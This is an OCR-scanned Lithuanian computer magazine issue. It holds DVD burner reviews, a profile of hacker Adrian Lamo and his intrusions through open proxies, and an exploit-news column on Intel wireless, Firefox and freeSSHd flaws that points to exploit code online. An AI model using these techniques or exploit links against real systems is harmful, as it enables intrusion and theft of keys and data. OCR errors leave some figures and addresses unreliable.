jeigu nereikia spausdintuvo — nereikia ir atskirai pirkti dažų. 
Tiesa, nupiešiamas vaizdelis yra monachrominis, o specialūs 
šią galimybę suteikiantys diskai kainuoja brangiau už kitus. 


[NEC ND-4551A] 

Suderinami DVD formatai: +/-R, +/-RW, -RAM 

DVD įrašymo greitis: +/-R (16x), +/-RW(8x/6x), +/-R DL(Bx/ 
6x), -RAM(5x) 

Testinis DVD+R 16x įrašymo greitis: 6.36 

Vyresnysis mūsų anksčiau aptarto NEC ND-3551A brolis. 
Įrenginiai skiriasi tik tuo, kad NEC ND-4551A palaiko DVD-RAM 
formato diskus. NEC įrenginiai, kurie prie vidutinių apsisukimų 
yra pakankamai tylūs, šiek tiek vibruoja pradedant skaityti ir 
monotoniškai gaudžia esant maksimaliems apsisukimams. Nepai- 
sant patobulinimų, turėjusių įtakos ND-4551A, vidutinio įrašymo 
greičio teste jis buvo šiek tiek lėtesnis, tačiau grafikuose puikiai 
matosi, kad įrašymas vyksta vienodai, 0 tai reiškia, kad įrenginiai 
identiški. Deja, įrenginiui nepavyko pasiekti maksimalaus galimo 
įrašymo greičio, kuris apčiuopiamai nukrito praėjus disko vidurį. 
Skaitymo kokybė džiugina. Net ir subraižyti diskai skaitomi ge- 
rai, tačiau nevertėtų tuo piktnaudžiauti. Labelflash technologija 
leis užrašus ant diskų dėlioti neatidarant įrenginio. Naudinga 
galimybė, juo labiau, kad greitai galima laukti diskų, ant kurių 
galima „piešti“ su lazeriu, kainų sumažėjimo. 


[PLEXTOR PX-755A] 

Suderinami DVD formatai: +/-R, +/-RW 

DVD įrašymo greitis: +/-R (16x), +/-RW(8x/6x), +/-R 
DL(10x/6x) 

Testinis DVD+R 16x įrašymo greitis: 8.35 

Gana žinoma kompanija rašančių įrenginių seriją papildė PLEX- 
TOR PX-755A modeliu. Pažiūrėkime, ka gi mums siūlo mainais 
į solidžią 120 dolerių sumą. Iš penkių formatų dirbama su 


keturiais — įvertinus kainą ir kompanijos vardą, techniniame 
įrenginio aprašyme buvo galima tikėtis rasti ir DVD-RAM 
palaikymą. Daugybė žamyboje įdiegtų naujų technologijų 
pakėlė kainą, kas atsiliepė ir įrašymo kokybei. Ko vertos vien 
įrašymo sustiprinimo technologija arba tuščio kaupiklio diag- 
nostika! Supratę, kad vartotojai vertina tylą, gamintojai įdiegė 
triukšmo slopinimo sistemą. Įrašymo grafike mes galime 
pastebėti staigų greičio kritimą ir tolimesnį jo stabilizavimą. 
Sumažinant sukimosi greitį gaunama geresnė įrašymo kokybė. 
Įrenginys pripažįsta LightScribe technologiją. 


[NEC ND-3551A] 

Suderinami DVD formatai: +/-R, +/-RW 

DVD įrašymo greitis: +/-R (16x), +/-RW(8x/6x), +/-R 
DL(8x/6x) 

Testinis DVD+R 16x įrašymo greitis: 6.31 

Į mūsų rankas pakliuvo ir stilingas juodas NEC įrenginys. 
Mūsų teste dalyvauja du NEC įrenginiai. Senesnio modelio 
galimybės šiek tiek menkesnės, tačiau vertėtų gerai pagalvoti, 
ar reikia už darbo su DVD-RAM galimybę atiduoti 10 žaliųjų 
pinigu. Įrašinėjant diskus, matomas praktiškai vienodas vaiz- 
das. Įrenginiui nepavyksta pasiekti deklaruojamo 16x įrašymo 
greičio, o įrašymo metu susiformavusi greičio „bangelė“ gali 
neigiamai atsiliepti ateityje. Artėjant prie disko galo, pastebi- 


mas didelis įrašymo greičio kritimas, kas įrenginiui šioje rung- 
tyje tikrai neprideda taškų. Su disko skaitymu NEC ND-3551A 
susitvarkė pakankamai lengvai, buvo pasiektas maksimalus 
16x greitis, o duomenys sėkmingai nuskaityti per ganėtinai 
trumpa laiką — 5 minutes ir 1 sekundę. Maloniai nudžiugino 
palaikoma Labe/flash technologija. Ji yra LightScribe analogas 
ir leidžia su rašymo įrenginiu ant disko „nupiešti“ paveikslėlį, 
tačiau nepamiršk, jog tam reikalingi specialūs diskai. 


ĮPIONEER DVR-110D] 

Suderinami DVD formatai: +/-R, +/-RW, -RAM 

DVD įrašymo greitis: +/-R (16x), +/-RW(8x/6x), +/-R DL(8x/ 
6x), -RAM (5x) 

Testinis DVD+R 16x įrašymo greitis: 6.15 

Po DVR-109D modelio Pioneer išleidžia DVR-110D. 
Dvisluoksnių diskų įrašymo greičio padidėjimas nudžiugins 
piniginguosius — dabar beveik 10 Gb galima įrašyti per viso 
labo 10 minučių. Nudžiugino pastangos triukšmo slopinimo 
srityje — disko kopijavimo metu įrenginys net ir prie maksimalių 
apsisukimų šnarėjo pakankamai tyliai. Įrenginys darbo metu 
kaista nestipriai, todėl galima nesukti galvos dėl supančių 
įrenginių temperatūros. Didelis skaitymo ir įrašymo greitis bei 
visų DVD formatų pripažinimas leidžia PIONEER DVR-110D 
kovoti dėl pirmos vietos su kitais konkurentais. Šiek tiek liūdina 


nuolatiniai greičio svyravimai įrašymo metu — taip veikia klaidų 
koregavimo sistema. Skaitymo metu įrenginys „paspringo“ 
ties paskutiniu šimtu megabaitų, tačiau kopijavima sugebėjo 
užbaigti sėkmingai 


[TEAC DV-W58E] 

Suderinami DVD formatai: +/-R, +/-RW 

DVD įrašymo greitis: +R (8x), +RW (4x) 

Testinis DVD-R 16x įrašymo greitis: 14.57 

Į mūsų testą pakliuvo kombo įrenginys, kuris savo privalumu sąraše 
turi ne tik DVD įrašymo galimybę, bet ir labai palankią kainą. „Gera 
kaina — tai dar ne viskas“, — nusprendėme mes ir paleidome 
įrašymo greičio testą. Mūsų nustebimui įrenginys nepasiekė plan- 
uoto 8x įrašymo greičio, sustojo ties 4x ir neskubėdamas įrašė diską. 
per beveik 15 minučių. Šiek tiek gaila, kad įrenginys skirtas visų 
formatų DVD diskų skaitymui, išskyrus DVD-RAM,, tačiau įrašinėti 
gali tik DVD+R/RW. Skaitymo metu kombo įrenginys pasirodė 
kuo puikiausiai ir be problemų skaitymo greičio kartelę pakėlė Iki 
12.37x. Geras skaitymo grafiko lankas yra praktiškai be dantukų, 
kas leidžia spręsti apie stabilų net ir subraižytų diskų skaitymą. 
Šiek tiek abejotinai atrodo kombo įrenginio pirkimas, kuomet 
multiformatiniai DVD tampa vis prieinamesni. 


[TEAC DV-W516GC] 
Suderinami DVD formatai: +/-R, +/-RW 


is: +/-R (16x), +/-RW(4x), +/-R 


Testinis DVD+R 16x įrašymo greitis: 6.02 

Savo CD-RW įrenginiais garsėjanti kompanija mus nudžiugino 
DVD įrašymo srities naujove ir mūsų teismui pateikė daugiaformatį 
DVD įrašymo įrenginį. Ganetinai demokratiška pusės šimto 
amerikietiškos valiutos kaina leidžia įsigyti kokybišką įrenginį su 
gerais greičio rodikliais. Įrašymo grafike aiškiai matos! greičio 
šuoliukas, tačiau apskritai įrašymas vyko puikiai. Labai nustebino 
to paties disko skaitymo grafikas, kadangi disko skaitymo sta- 
bilumas išorinėse vijose kelia didelių abejonių. TMos mėgėjams 
įdomų bus tai, kad aktwiai dirbant su disku vibracija ir triukšmas 
neviršija vidutinio lygio, t.y. grojant muziką TEAC DV-W5166GC jos 
nenustelbs savo dūzgimu. Priimtina kaina ir didelis įrašymo greitis 
gali sudominti kokybiškos technikos gerbėjus. Liūdina tik žemas 
darbo greitis su perrašomais ir dvisluoksniais diskais. 


[ASUS DRW-1608P2S] 

Suderinami DVD formatai: +/-R, +/-RW, -RAM 

DVD įrašymo greitis: +-/-R (165), +/-RW(8x/6x), +/-R DL(85), 
—RAM(5x) 

Testinis DVD+R 16x įrašymo greitis: 6.16 

Daugiaformatį įrenginį mums pristatė ir „Asus“. Įrenginiui tinka visų 
tipų diskai, jo techninės ir greičio charakteristikos tesiog pulkios. 
Pilnaverčio darbo galimybės su bet kokias diskais (neva su buitiniu 
įrenginiu įrašytas DVD-RAM ar iš draugo pasiimtas DVD-RW) tikrai 
pravers. Pravers ir optimalaus greičio nustatymo įrašymo metu 
kiekvienam konkrečiam kaupikliui technologija, kadang| kartais 
parduotuvių lentynose galima rasti ne pačius kokybiškiausius dis- 
kus. Prieš tai įrašyto disko skaitymas praėjo be nuotykiu, tačiau 
maksimalaus greičio pasiekti nepavyko, nors teste įdarbinti diskai 
buvo vienodi. Visų firminių technologijų pritaikymas leidžia būti 
tikram dėl įrašymo kokybės, todėl net ir pasiekus maksimalų greitį 
įrenginys puikiai susidoros su jam iškelta užduotimi. 
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Benamio hakerio gyvenimo kelias 
YAHOO!, MICROSOFT, AOL TIME WARNER, EXCITEOOHOME, MCI WORLD- 
COM, NSA CONTRACTOR CSC, CINGULAR, THE NEW YORK TIMES — NE 
KIEKVIENAS ĮSILAUŽĖLIS GALI PATEKTI Į ŠIŲ STAMBIAUSIŲ KOMPANIJŲ 
KORPORATYVINIUS TINKLUS. TAČIAU NĖRA NIEKO NEĮMANOMO, JUK VISI 
ŠIE VARDAI ĮEINA Į AMERIKIEČIŲ HAKERIO ADRIANO LAMO, KURĮ SPAUDA 
PAVADINO „BENAMIU HAKERIU“, NUOPELNŲ SĄRAŠĄ. DAR VIENA ABRI- 
ANO PRAVARDĖ — HELPFUL HACKER (ANGL. — NAUDINGAS HAKERIS). 
KODĖL — SKAITYK TOLIAU. 


[Hakerio vaikystė] 
Adrianas Lamo gimė 1981 metais, JAV šiaurėje, Bostone (Masačūsetso valstija). Po kurio laiko jo 
šeima persikėlė į San Franciską, kur jis ir praleido savo mokyklinius metus. Pirmą kartą su kompiuteriu 
Adrianas susidūrė būdamas 6—7 metų — jo tėvas turėjo tuomet populiarų Commodore 64. Pirmųjų 
vaikino „laužimų“ aukomis tapo tekstiniai adventure'ai. 
Kai jam sukako septyniolika, tėvai nusprendė iš San Francisko persikelti į tylesnę ir ramesnę vietą, 
kuria tapo Sakramentas. Adrianui persikėlimo idėja visiškai nepatiko jam gyvenimas triukšminguose 
miesto kvartaluose buvo kur kas priimtinesnis, nei miegamuosiuose priemiesčių rajonuose. Jis pagei- 
davo likti dideliame mieste, juo labiau, kad tuo metu jis kaip tik baigė mokyklą. Taigi neturėdamas 
rimto išsilavinimo ir stogo virš galvos, Lamo turi rūpintis pats savimi. 
Kadangi jis tuo metu jau nemažai išmanė apie kompiuterius, Adrianas pradeda uždarbiauti įvairiose 
firmose, atlikdamas įvairius su kompiuteriais susijusius darbus, tuo pačiu gana dažnai lieka nakvoti 
tiesiog biure. Kiek vėliau jam pavyko įsitaisyti informacinio saugumo konsultantu į žymiają firmą Levi 
Strauss, tiesa, ten jis išbuvo vos tris mėnesius. Tai vienintelis su informaciniu saugumu susijęs darbas, 
kuris gali būti įrašytas Adriano reziumė. Jo paskutinio pusmečio gyvenamąją vietą dengia paslapties 
šydas, kurio nenori atskleisti pats Adrianas. Galų gale hakeris metė gyvenimą biure ir leidosi į klajoklio 
kelią. 


[Kompiuterinis valkata] 
Jis keliavo po visą šalį, su savimi turėdamas tik kuprinę, kurioje buvo jo mylimas nešiojamasis kompiu- 
teris, pirmosios medicininės pagalbos rinkinys, rūbų komplektas ir šiltas apklotas. Būtent šiuo periodu 
Adrianas Lamo atliko savo įžymiausius stambiausių korporatyvinių informacinių sistemų nulaužimus. 
Jie buvo įvykdyti su „Toshiba“ kompiuteriu, kurio klaviatūroje trūksta dviejų klavišų, iš interneto kavinės 
arba iš kitų vietų, kur per Wi-Fi galima prisijungti prie interneto. Beje, įsiskverbimui į apsaugotus tinklus 
hakeris naudojo tik naršyklę ir IP adresų skenerį. 
Adrianas neturėjo vairuotojo pažymėjimo, todėl per šalį keliavo autostopu, juo labiau, kad taip buvo 
galima keliauti anonimiškai. Kai tekdavo įveikti didelius atstumus, jis tai darydavo su autobusais 
ir traukiniais. Dažniausiomis Lamo gyvenimo vietomis buvo San Franciskas, Filadelfija, Vašingtono 
priemiesčiai ir Pitsburgas, kartkartėmis jis taip pat aplankydavo Sakramentą. Naktis hakeris dažniausiai 
praleisdavo interneto kavinėse, kartais likdavo pas draugus. Retkarčiais nakvodavo apleistuose pastatu- 
ose ir statybų aikštelėse. „Aš nuolat judu, panašiai kaip Sadamas Huseinas, — ne daugiau kaip dvi 
naktis vienoje vietoje“, — viename savo interviu pareiškė Adrianas. 
Savo įsilaužimus hakeris atlikinėjo savarankiškai, prieš tai keletą mėnesių studijuodamas „aukas“. 
Kartais jis kartu su draugais išeidavo į įdomios makulatūros medžioklę netoli nuo stambių firmų biurų 
esančiuose šiukšlių konteineriuose. 2001 metų rugsėjį Lamo patenka į Yahoo! News naujienų pub- 
likavimo sistemą. Adminai taip ir būtų nepastebėję įsilaužimo, jeigu Adrianas pats nebūtų apie tai 
parašęs SecurityFocus'e. Vienintelis dalykas, kurį hakeris pakeitė sistemoje — tai kelių straipsnių turinys. 
Pavyzdžiui, straipsnyje apie tuomet JAV areštuotą Dmitrijų Skliarovą jis „pataisė“ galimą bausmę, dėl 
ko Skliarovui neva grėsė mirties bausmė. 
Dar po mėnesio Lamo pavyko nulaužti Microsoft ir patekti į šios kompanijos klientų, pirkusių 
mažaminkščių produktus internetu, duomenų bazę. 


[„Naudingas“ hakeris] 
Adrianas su savo laužimais niekada neturėjo jokių savanaudiškų tikslų. Kaip jis pats sakė, visa tai 
buvo daroma vien iš smalsumo. Jis taip pat nemėgo save įvardyti kaip „hakerį“ ir rinkosi „saugumo 
tyrinėtojo“ terminą. Nepaisant to, juridiniu požiūriu kiekvienas jo laužimas buvo rimtas nusikaltimas, 
juo labiau, kad viskas vyko JAV, kur taikomi griežti kompiuterinių nusikaltimų įstatymai. Situaciją ap- 
sunkino tai, kad Lamo įsilaužimų aukomis tapdavo vis solidesnės ir įtakingesnės korporacijos. Vis dėlto 
iki šiol jis už nieką nebuvo baudžiamas. Adrianas visada pranešdavo apie surastus pažeidžiamumus: 
ir net padėdavo juos pašalinti. Už tai spauda jį pakrikštijo „padedančiuoju hakeriu“.. 
2001 metų gruodį SecurityFocus svetainėje pasirodė Kevino Poulseno straipsnis apie Adriano 
Lamno įsiskverbimą į vidinį komunikacijų giganto „WorldCom“, kuris buvo stambiausias JAV inteneto 
paslaugų tiekėjas, tinklą. Kaip įprasta, šiam įsilaužimui Adrianas naudojo naršyklę ir IP adresų 
skenerį (jo naudojamas įrankis vadinosi proxy-hunter, kuris net ir su modeminiu prisijungimu 
leisdavo nurodytame IP adresų diapazone dideliu greičiu ieškoti SOCKS proxy serverių), su kuriuo 
skenuodavo kompanijos serverių adresų erdvę ir ieškodavo paslėptų proxy serverių, kurie tarnautų 
kaip vartai tarp interneto ir vidinio tinklo. Adrianui pavyko surasti net penkis tūkstančius tokių 
serverių, beje, vienas iš jų buvo pagrindiniame wireless.wcom.com serveryje. Prisijungęs tarnautojo 
vardu, Adrianas pradėjo studijuoti vidinį kompanijos tinklą ir greitai susidūrė su keliais apsaugos 
lygiais, kurie, priklausomai nuo tarnautojo pareigybės, ribojo priėjimą prie informacijos. 
Per maždaug du „WorldCom“ tinklo tyrinėjimo mėnesius hakeris gavo priėjimą prie 86 tūkstančių 
kompanijos darbuotojų duomenų bazės, kurioje be viso kito buvo saugoma ir informacija apie 
Jų kreditines korteles. Be to, jis galėjo sekti tarp pagrindinio kompanijos biuro ir jos Mek- 
sikos padalinių cirkuliuojančią informaciją. Tačiau svarbiausia yra tai, kad Lamo pavyko gauti 
WARM (Web Access Router Maintenance tool) sistemos valdymo teises. WARM — tai visus 
maršrutizatorius kontroliuojanti programa, o maršrutizatoriai veikė uždaruose tokių kompanijų, 
kaip „Bank of America“, „JP Morgan“, „Citicorp“, „Sun Microsystems“ ir AOL (1997 metais 
„WorldCom“ už 175 milijonus dolerių nusipirko kompaniją „ANS Communications“, kuri Ir 
sukūrė WARM) tinkluose. Įsikišimas į tokios sistemos veikimą iš įsilaužėlio pusės aukščiau 
išvardintoms kompanijoms galėjo pridaryti milžiniškų nuostolių. O juk panorėjęs prieiti prie šios. 
sistemos galėjo bet kuris darbuotojas — priėjimo slaptažodis buvo tikrinamas su paprasčiausiu 
javaseript'u ir buvo saugomas priėjimo puslapio išeities tekste. Vėliau Lamo pasakė: „WorldCom“ 
darbuotojams visas jų internetas — tai nuobodus dalykėlis naršyklėje. O man tai yra gigantiška 
žaidimų aikštelė, kurios saugumo tarnybos mane mandagiai praleidžia ten, kur man reikia“. 
Po du mėnesius trukusio klaidžiojimo po korporatwinį „WorldCom“ tinklą Adrianas per Secu- 
rityFocus susisiekė su kompanija ir nurodė visus jo surastus pažeidžiamumus. Jau kitą dieną 
Jie paskambino į hakerio mobilųjį telefoną, įdėmiai išklausė jo rekomendacijas, kaip pašalinti 
saugumo skyles, 0 po jų likvidavimo vėl pasiūlė išbandyti galimybę nesankcionuotai prieiti prie 
sistemos. Galų gale kompanija liko patenkinta tokiu bendradarbiavimu, o hakeriui buvo iškeltas 
reikalavimas pasirašyti susitarimą dėl konfidencialios informacijos neatskleidimo. 
Ir tai toli gražu ne vienintelis Lamo bendradarbiavimo su kompanijomis, kurių tinklus jis nulaužė, 
atvejis. Pavyzdžiui, gavęs priėjimą prie milijonų šiandien jau neegzistuojančios kompanijos 
Excite(OHome klientų įrašų, jis pats atėjo į jos biurą Kalifornijoje, norėdamas susitikti su tinklo 
administratoriais ir parodyti jiems jų paliktas saugumo skyles. 


[Išgarsėjimas] 

Garsių įsilaužimų serija ir neįprastas gyvenimo būdas pritraukė vis daugiau spaudos dėmesio. Apie 
Adrianą Lamo pradėjo rašyti populiariausia Amerikos spauda. Jis pats buvo visai nieko prieš tokią 
šlovę, priešingai, jis mielai žumalistams dalino interviu. Tuo pat metu hakeris nuolat balansuoja 
antįstatymo ribos, žumalistai rašo, kad turint norėdamos nuo įsilaužimų nukentėjusios kompanijos 
|žymųjį hakerį lengvai įkištų už grotų. Tačiau kadang jis niekam piktybiškai netrukdo ir nepridaro jokių 
nuostolių, kol kas nė viena kompanija to nesiėmė. Be to, teisminis procesas su Lamo pakenktų bet 
kokios kompanijos įvaizdžiui — visuomenė greičiausiai užimtų hakerį ginančią poziciją. 

Kartą NBC žurnalistas Adrianui pasiūlė prieš kameros objektyvą patekti į vidinį pačios telekom- 
panijos tinklą. Kaip bebūtų keista, hakeris sutiko, o nufilmuota medžiaga turėjo patekti į naktinių 
naujienų eterį. Vis dėlto studijoje buvo nuspręsta medžiagos netransliuoti bei rimtai susimąstyta 
apie juridinę šio epizodo pusę. Viena vertus, leidimas įsilaužti nebuvo duotas, o tai reiškia, kad 
buvo atliktas kompiuterinis nusikaltimas. Kita vertus, visame tame dalyvavo pačios kompanijos 
žumnalistas ir operatorius, nejaugi juos teisi kaip bendrininkus? 
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Kompiuterių pogrindyje nuomonės apie Lamo išsiskyrė: vieniems jis tapo didvyriu ir net dievaičiu, kiti || 
kritikavo, kaltindami priklausant skriptvaikių armijai bei pozuojant spaudai. Tačiau kad ir koks spaudos 
numylėtinis buvo Lamo, būtent per ją galiausiai jis susilaukė didelių nemalonumų. 

2002 metų vasario 28 dieną SecurityFocus'e pasirodo Kevino Poulseno straipsnelis apie korporatyvinio 
New York Times tinklo nulaužimą. Jame buvo sakoma, kad silpna kompanijos tinklo apsaugos vietą 
Adrianui pavyko surasti vos po dviejų minučių tyrinėjimo — pačiame pirmame jų aptiktame serveryje 
veikė atviras proxy serveris. Sukonfigūravęs savo naršyklę veikti per šį proxy, hakeris pateko į vidini 
tinklą, kur atrado dar keletą priėjimo kontrolės sistemos pažeidžiamumų. Po nulaužimo jam pavyko 
gauti priėjimą prie 3 tūkstančių žmonių asmeninių duomenų, kurie laikraštyje publikavo savo straip- 
snius ir kurie jam duodavo interviu, O kadangi laikraštis bendravo su daugeliu stambių vyriausybės 
pareigūnų, politikų ir verslininkų, tarp kurių buvo buvęs JAV valstybės sekretorius Džeimsas Beikeris, 
ginkluotės inspektorius Ričardas Batleris, buvęs JAV prezidentas Ronaldas Reiganas, Jasiras Arafatas 
ir net Bilas Geitsas, tai ši informacija jau savaime kėlė didelį susidomėjimą. Pramogaudamas Lamo 
įtraukė save į laikraščio darbuotojų sąrašą kaip informacijos saugumo specialistą, o po to apie surastus 
pažeidžiamumus informavo tinklo administraciją. New York Times prasidėjo vidinis tyrimas, po kurio 
kompanija kreipėsi į policiją, kaltindama hakerį nesankcionuotu įsiskverbimu ir slaptažodžių grobimu. Be 
to, Lamo buvo apkaltintas informacinės sistemos LexisNexis naudojimu Times vardu. Bendri laikraščiui 
padaryti nuostoliai įvertinti 300 tūkstančių dolerių. Pagal JAV įstatymus panašūs kaltinimai bendrai 
paėmus užtraukia laisvės atėmimo bausmę nuo 5 iki 15 metų ir milžinišką baudą. Byla buvo perduota 
FTB, kur prieš hakerį prasidėjo ilgai trunkantis tyrimas. 


[Teismas] 
Tuo metu Adrianas ėmė suvokti, kad jo veikla gali patikti ne visiems, tačiau jis vis tiek neatsisakė 
„padedančiojo hakerio“ pozicijos. „Informacinio saugumo terorizmo epochoje“ konferencijoje, kurią 
organizavo Amerikos vadybos sociacija (American Management Association), Lamo pirmą kartą sakė 
kalbą, Kuri buvo skirta tinklo saugumui. Savo pasirodyme jis gynė tuos hakerius, kurių veikla kompani- 
joms neatneša nuostolių ir kurie padeda pašalinti surastus pažeidžiamumus, kvietė į juos ir jų veiklą 
atsižvelgti su supratimu ir neįžiūrėti juose nusikaltėlių. 
Tuo metu FTB agentai apklausinėjo Adriano Lamo pažįstamus ir mėgino surinkti kompromituojančios 
medžiagos. Buvo tiriami jo praeities įsilaužimai. Birželį Lamo tyrimas tapo plačiai žinomas — FTB iš 
korespondento, kuris iš hakerio ėmė interviu, pamėgino gauti informaciją apie ryšio su juo būdus bei 
paties interviu medžiagą. Tačiau pagal JAV istatymus tokie veiksmai be specialaus Teisingumo minis- 
terijos leidimo yra neteisėti. Finale dėl to spaudoje kilo nedidelis skandalas. 
Ir štai 2003 metų rugsėjo pradžioje teisėjas pasirašo Lamo areštavimo orderį. FTB agentai aplankė jo 
tėvų namus, kur, be jokios abejonės, jo nerado. Namą pradėta stebėti, apie ką hakeris sužinojo po kelių 
dienų. Adrianas keletą dienų mėgino slėptis, tačiau rugsėjo 9 dieną po derybų su FTB per advokatą jis 
nusprendė pats pasiduoti teisėsaugos organams. Praleidęs naktį kameroje, jis buvo paleistas už 250 
tūkstančių dolerių užstatą — tėvai užstatė savo namą — su sąlyga, kad po keleto dienų jis stos prieš 
Niujorko federalinį teismą. 
Manhetene vykusiame teismo posėdyje Adrianui kurį laiką buvo skirtas namų areštas ir dalinai apribota 
teisė naudotis internetu. Tuo metu internete buvo pradėta hakerio palaikymo akcija — freelamo.com. 
Ten buvo publikuojamos paskutinės naujienos apie tyrimo eigą, pateikiami švieži interviu ir panašiai. Po 
keleto teismo posėdžių mėnesių Adrianas Lamo dėl jam iškeltų kaltinimų prisipažino kaltu, dar keleto 
mėnesių teismui prireikė kad paskelbtų nuosprendį. Adrianas buvo nuteistas pusės metų namų areštui 
ir dviems metams lygtinio stebėjimo, jam paskirta 65 tūkstančių dolerių bauda. Įvertinus ieškovų reika- 
lavimus ir FTB pastangas į tyrimą įtraukti praeities nuodėmes (pavyzdžiui, mažaminkščių nulaužimą), 
tai ganėtinai švelnus nuosprendis. Be to, Lamo buvo įpareigotas lygtinio laikotarpio metu dirbti arba 
pratęsti savo mokslus. 
Istorijos pabaiga? 
Kaip ir reikalavo teismas, Lamo apsistojo savo tėvų namuose ir nusprendė pratęsti mokslus. Jis įstojo 
į Sakramento koledžą, žurnalistikos fakultetą, 0 spauda dabar kur kas rečiau rašo apie garsius jo 
įsilaužimus ir praktiškai nepublikuoja jo interviu. Ar taip ir pasibaigė benamio hakerio istorija? Kas čia 
žino. Viename pirmųjų savo interviu Adrianas sakė: „Aš sutinku su tuo, kad svetainių laužimas — ne pats 
saugiausias būdas praleisti savo laisvalaikį. Jeigu mane pasodins, reiškia, taip turi būti“. Iš šio pasakymo 
tampa aišku, kad laužimas jam yra kai kas daugiau, nei tiesiog pramoga ar hobis, tai, kaip jis pats kartą 
sakė, jo religija. Kevinas Poulsenas savo straipsnyje „Lamo's Adventures in WorldCom“ Lamo pavadino 
naujos kartos atstovu, kuris supančios aplinkos neįsivaizduoja be asmeninių kompiuterių, kartos, kuri 
gyvena skaitmeniniame pasaulyje. Ir jeigu taip, tai Adrianas Lamo dar tikrai apie save praneš. 
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EKSPLOITŲ APŽVALGA 


Intel Wireless Service (524evmon. 
exe) Shared Memory Exploit 


[Aprašymas] Įsilaužėliai pagaliau 
prisikasė ir iki Intel. Šį kartą tau 
pristatau eksploitą, kuris leidžia loka- 
liam vartotojui gauti belaidės Intel 
tinklo įrangos konfigūracijos duomenis 
(pavyzdžiui, WEP raktus). 
Pažeidžiamumas čia atrastas todėl, 
kad pagal nutylėjimą priėjimui į 
bendrą sekciją „MBaseNamedObjects4 
S24EventManagerSharedMemory“, 
kurią naudoja Wireless Management 
Service (S24EvMon.exe), suteikiamos 
nesaugios privilegijos. Lokalus varto- 
tojas gali gauti svarbius konfigūracijos 
duomenis, pavyzdžiui, belaidžio adapt- 
erio WEP raktus. 


[Apsauga] Siūlyčiau dažniau apsi- 
lankyti Intel svetainėje, kadangi šiuo 
metu apsisaugojimo priemonių nėra. 


[Nuorodos] Paskaityti apie 
pažeidžiamumą galima čia: ww.se- 
curitylab.ru/vulnerability/267299.php. 
Eksploitą rasi adresu ww. milwOrm 
com/exploits/1772.. 


[Blogio įvertinimas ir potencialas] 
Bet kokia kvailystė ir klaida brang- 
iai kainuoja. Manau, kad didelių 
belaidžių tinklų savininkai atsidurs, 
švelniai tariant, keblioje padėtyje. 
Jeigu wardriveriai ir anksčiau lauždavo 
visur Ir viską, tai dabar jie tam turės 
paruoštą įrankį. 


[Sveikinimai] Reiškiame padėką 
žmogui, kurio vardas — Ruben San- 
tamarta (ruben(dreversemode.com). 


Mozilla Firefox <= 1.5.0.3 
(Loop) 88 1.5.0.4 (Marguee) 
DoS exploit 


[Aprašymas] Še tau, kad nori, vos 
tik spėjome parašyti apie ugninę 
lapę, kaip iš eilės išėjo dar du DoS 
eksploitai. Mozilla programuoto- 
jams nesiseka. Nerekomenduočiau 
šių eksploitų testuoti savo mašinoje. 

paprasčiausiai užlauši nelaimingą 
kompiuterį. Testuojant 1.5.0.3 ver- 
sijai skirtą eksploitą mano naršyklė 
suėdė 9976 procesoriaus laiko. 
1.5.0.4 versijos eksploitas sukurtas 
dėl <marguee> tago apdorojimo 
klaidos. Vieša eksploito versija 
paprasčiausiai užiaužia naršyklę, 
tačiau aš įtariu, kad privačiose 
rankose yra aukos mašinoje laisvai 
pasirinktą kodą įvykdantis visrak- 
tis. 


[Apsauga] Apsauga yra viena 
— oficialioje naršyklės svetainėje 
užsiprenumeruoti naujienas. Taip 
tu galėsi nepraleisti naujausių 
pataisymų 


[Nuorodos] Peržiūrėti nesudėtingą 
eksploitų kodą gali šiais adresais: 
http://milvOrm.com/exploits/1802 
ir www.securitylab.ru/poc/extra/ 
268344.php. Atnaujinimo ieškok 
gamintojo svetainėje: www. mozilla. 


org. 


[Blogio įvertinimas ir poten- 
cialas] Dėl paskutinių dienų įvykių 
Mozilla savo skylėtumu rizikuoja 
aplenkti net ir MS IE. Juokauju, to 
nebus, tačiau vis tiek, FireFox rep- 
utacijai tai didelis smūgis. 


[Sveikinimai] Aprašytus eksploitus 
sukūrė Gianni Amato (ww.gian- 
niamato.it) ir nOOb. 


freeSSHd <= 1.0.9 Key 
Exchange Algorithm Buffer 
Overflow Exploit 


[Aprašymas] Sploitas susidoro- 
ja su FreeSSHd 1.0.9 ir, kaip sa- 
koma, net ir kitas versijas. Pats 
pažeidžiamumas leidžia nutolu- 
siam vartotojui aukos sistemoje 
įvykdyti laisvai pasirinktą kodą. 
Klaida čia slypi dėl duomenų ribų 
patikrinimo klaidos, apdorojant 
algoritmo eilutę iš SSH kliento 
gauto rakto apsikeitimo metu. 
Nutolęs vartotojas gali perpildyti 
steką ir pasirinktoje sistemoje 
įvykdyti savo kodą. 


[Apsauga] Tiek eksploitas, tiek 
ir pažeidžiamumas yra santyki- 
nai nauji. Taigi pataisymai dar 
nesukurti, todėl šiandien šios 
problemos sprendimo būdų dar 
nėra. 


[Nuorodos] Kaip visada, 
šviežiausią informaciją tu gali 
adresu www.securitylab.ru/ 
vulnerability/267367.php. 
Eksploitą rasi čia: www.milwOrm. 
com/exploits/1787. 


[Blogio įvertinimas ir poten- 
cialas] 

Ką gi, freeSSHd savininkams 
bus nelengva, tiesa, vargu ar 
dėl to įvyks koks nors globalus 
laužimas. Tiesiog kas nors ką 
nors šiek tiek palaužys ir pamirš, 
tačiau atnaujinti pažeidžiamą 
demoną vis tiek būtina. 
Sveikinimai 

Šį stebuklą sukūrė Taugeer Ah- 
mad a.k.a Ox-Scientist-x0. 


BŪK KONKRETUS IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ | HACK-FAO, 
STENKIS JĄ KUO IŠSAMIAU APRAŠYTI. TIK 
TUOMET AŠ GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BEI PARODYTI GALIMAS KLAIDAS. 
VENK BENDRINIŲ KLAUSIMŲ, PANAŠIŲ Į 
„KAIP NULAUZŽTI INTERNETĄ?“ — TU TIK 
APKRAUSI SAVO IR MANO PAŠTO DĖŽUTES. 
IŠ MANĘS GREŽTI KO NORS UŽ DYKĄ (IN- 
TERNETO, SHELLŲ IR PANAŠIAI) NEVERTA, 
NES AŠ PATS GYVENU IŠ HUMANITARINĖS 
PAGALBOS! 


(O) Patark, kokia programa galima nukreipti jungtis? 


Iš pradžių reikia aptarti tai, kas gį yra tie jungčių nukreipimo 
įrankiai. Programa-servisas vienoje jungtyje gautą TCP/ 

IP srautą nukreipia į kitą pačioje programoje nurodytą 
jungtį. o galbūt ir į kitą tinklo mazgą. Nukreipimo metu 

